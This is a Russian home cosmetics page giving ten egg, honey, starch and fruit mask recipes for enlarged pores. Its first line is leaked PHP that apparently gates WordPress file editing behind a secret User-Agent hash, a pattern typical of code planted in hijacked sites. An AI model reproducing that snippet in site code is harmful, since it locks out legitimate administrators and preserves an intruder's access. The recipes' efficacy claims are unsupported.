if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Устранение проблемы расширенных пор с помощью масок. 10 рецептов | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Устранение проблемы расширенных пор с помощью масок. 10 рецептов

В первую очередь проблема с расширенными порами возникает у тех, кто имеет кожу с повышенной жирностью. Это может быть вызвано или наследственными причинами, или приобретенными.

Воз­мож­ные вари­ан­ты воз­ник­но­ве­ния про­бле­мы рас­ши­рен­ных пор следующие:

  • Не уде­ля­лось долж­но­го вни­ма­ния ухо­ду за кожей лица;
  • Вслед­ствие забо­ле­ва­ния внут­рен­них органов;
  • Вслед­ствие кож­ных заболеваний;
  • Воз­раст­ные гор­мо­наль­ные нарушения.

Нату­раль­ная кос­ме­ти­ка сво­и­ми рука­ми изго­тов­лен­ная, помо­жет изба­вить­ся от про­бле­мы рас­ши­рен­ных пор и сопут­ству­ю­щих ей недо­стат­ков кожи. Необ­хо­ди­мо гра­мот­но и регу­ляр­но уха­жи­вать за кожей с помо­щью спе­ци­аль­ных масок, выбрав из боль­шо­го коли­че­ства рецеп­тов наи­бо­лее под­хо­дя­щий имен­но вам.

Эффект применения масок

15Мас­ки для пори­стой кожи пред­на­зна­че­ны нор­ма­ли­зо­вать состо­я­ние кожи, при­дать ей ухо­жен­ный и здо­ро­вый вид. Для это­го осу­ществ­ля­ют­ся сле­ду­ю­щие функции:

  • Сужа­ют­ся поры;
  • Увлаж­ня­ет­ся кожа;
  • Рабо­та саль­ных желез нор­ма­ли­зу­ет­ся, сни­жа­ет­ся выра­бот­ка веществ;
  • Оча­ги вос­па­ле­ний начи­на­ют утихать;
  • Поры глу­бо­ко очищаются;
  • Улуч­ша­ет­ся цвет лица;
  • Раз­дра­же­ние успокаивается;
  • Жир­ный блеск пропадает.

Уход за кожей лица с помо­щью спе­ци­аль­но раз­ра­бо­тан­ных масок, помо­жет сузить поры, нор­ма­ли­зо­вать рабо­ту желез, кото­рые осу­ществ­ля­ют выра­бот­ку кож­но­го сала, устра­нить про­бле­мы жир­ной кожи. Глав­ное при­ме­нять рецеп­ты созда­ния домаш­ней кос­ме­ти­ки, учи­ты­вая реко­мен­да­ции и правила.

Правила использования масок

12Рас­ши­рен­ным порам тре­бу­ет­ся спе­ци­аль­ный уход, кото­рый не тер­пит экс­пе­ри­мен­тов и пре­не­бре­жи­тель­но­го отно­ше­ния. Ина­че есть риск полу­чить обрат­ный резуль­тат с еще более заби­ты­ми пора­ми и вос­па­ле­ни­ем кож­но­го покро­ва. Пра­ви­ла исполь­зо­ва­ния масок для начи­на­ю­щих забо­тить­ся о здо­ро­вье сво­ей кожи долж­ны соблю­дать­ся в пол­ном сво­ем объеме:

  • Перед про­цес­сом нане­се­ния мас­ки, необ­хо­ди­мо с помо­щью паро­вой бани или горя­чей ван­ной, мак­си­маль­но рас­ши­рить поры;
  • Наи­бо­лее пред­по­чти­тель­но выби­рать рецепт мас­ки с содер­жа­ни­ем в нем бел­ка, так как это самое уни­вер­саль­ное сред­ство для суже­ния пор;
  • Яйца луч­ше исполь­зо­вать не мага­зин­ные, а домашние;
  • Перед тем, как нане­сти мас­ку, сле­ду­ет про­те­сти­ро­вать ее, нане­ся на уча­сток на запястье или на тыль­ной сто­роне руки, что­бы избе­жать аллер­ги­че­ских реакций;
  • Смы­вать мас­ку необ­хо­ди­мо теп­лой водой;
  • После мас­ки нане­сти на кожу обя­за­тель­но еже­днев­ный крем;
  • Курс масок для суже­ния пор необ­хо­ди­мо выпол­нять по 2 раза за неде­лю и не менее 10 процедур.

Кос­ме­ти­ка в домаш­них усло­ви­ях при­не­сет вам ожи­да­е­мый резуль­тат и улуч­шит функ­ци­о­ни­ро­ва­ние саль­ных желез, если выпол­нять все реко­мен­да­ции и пра­ви­ла по ее при­го­тов­ле­нию и использованию.

10 наиболее эффективных масок от расширенных пор

13Что­бы опре­де­лить­ся, какая из мно­же­ства рецеп­тов иде­аль­но подой­дет имен­но для вас, при­дет­ся про­ве­рить дей­ствие раз­лич­ных масок. Инди­ви­ду­аль­ность кожи не поз­во­ля­ет полу­чить оди­на­ко­вый резуль­тат для всех – кому-то та или иная мас­ка пре­крас­но под­хо­дит и помо­га­ет, а кому-то иде­аль­но подой­дет дру­гая. Лечеб­ная кос­ме­ти­ка гра­мот­но при­го­тов­лен­ная и при­ме­ня­е­мая в ком­форт­ных домаш­них усло­ви­ях, помо­жет пре­крас­но рас­сла­бить­ся, полу­чить удо­воль­ствие от про­цес­са, а тем более от полу­чен­но­го результата.

Рецепт маски от расширенных пор №1. Желтково-медовая маска

Рас­те­реть яич­ные желт­ки (2 шт.), мед (3 ст. лож­ки) и оста­вить на 6–8 часов при ком­нат­ной температуре.

Рецепт маски от расширенных пор №2. Маска с белком и соком алоэ

Во взби­тый до пены белок доба­вить сок алоэ (1 ч. ложку).

Рецепт маски от расширенных пор №3. Яблочно-крахмальная

Кис­лое зеле­ное ябло­ко необ­хо­ди­мо нате­реть и сме­шать (2 ст. лож­ки) с крах­ма­лом (1 ч. ложка).

Рецепт маски от расширенных пор №4. Маска из хлеба

Хлеб ржа­ной (100 гр.) нуж­но залить кипят­ком и оста­вить на 30 минут отмо­кать, затем выжать и в теп­лом виде поло­жить на кожу лица.

Рецепт маски от расширенных пор №5. Маска из груши с крахмалом

Очи­щен­ная от семе­чек и кожи­цы спе­лая гру­ша, пре­вра­щен­ная в пюре, сме­ши­ва­ет­ся (2 ст. лож­ки) с крах­ма­лом (1 ч. ложка).

Рецепт маски от расширенных пор №6. Маска из капусты

Ква­ше­ную, соч­ную капу­сту сле­ду­ет пору­бить и измель­чен­ную нало­жить на кожу.

Рецепт маски от расширенных пор №7. Белково-огуречная маска

6

Снять кожу­ру с огур­ца, нате­реть и отжать сок (2 ст. лож­ки), кото­рый сме­шать со взби­тым белком.

Рецепт маски от расширенных пор №8. Белково-овсяная маска или «Голливудская маска»

Во взби­тый белок добав­ля­ет­ся муку овса (2 ст. лож­ки). Допус­ка­ет­ся заме­нить овся­ную муку куку­руз­ной. Бес­плат­ная кос­ме­ти­ка, при­го­тов­лен­ная дома по это­му рецеп­ту, извест­на как «Гол­ли­вуд­ская мас­ка», кото­рой поль­зу­ют­ся извест­ные звезды.

Рецепт маски от расширенных пор №9. Маска с лимоном и белком

Во взби­тый яич­ный белок добав­ля­ет­ся лимон­ный сок (1 ч. лож­ка) и сода питье­вая на кон­чи­ке ножа.

Рецепт маски от расширенных пор №10. Маска из комплекса эфирных масел или «Маска королевы Виктории»

Муку ячмен­ную (50 гр.) сме­шать с медом (1 ст. лож­ка) и яич­ным бел­ком. С помо­щью мик­се­ра взбить смесь и доба­вить эфир­ное мас­ло мож­же­вель­ни­ка и мяты (по 1 кап­ле). Уход за кожей лица с помо­щью этой мас­ки обя­за­тель­но помо­жет вашей коже обре­сти здо­ро­вый и цве­ту­щий вид – ведь этот рецепт изве­стен, как «Мас­ка коро­ле­вы Виктории».

При­го­тов­лен­ные в домаш­них усло­ви­ях из нату­раль­ных ингре­ди­ен­тов кос­ме­ти­че­ские про­це­ду­ры, пода­рят вам пре­крас­ную, кра­си­вую, сия­ю­щую кожу, а сле­до­ва­тель­но, пре­крас­ное настроение.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!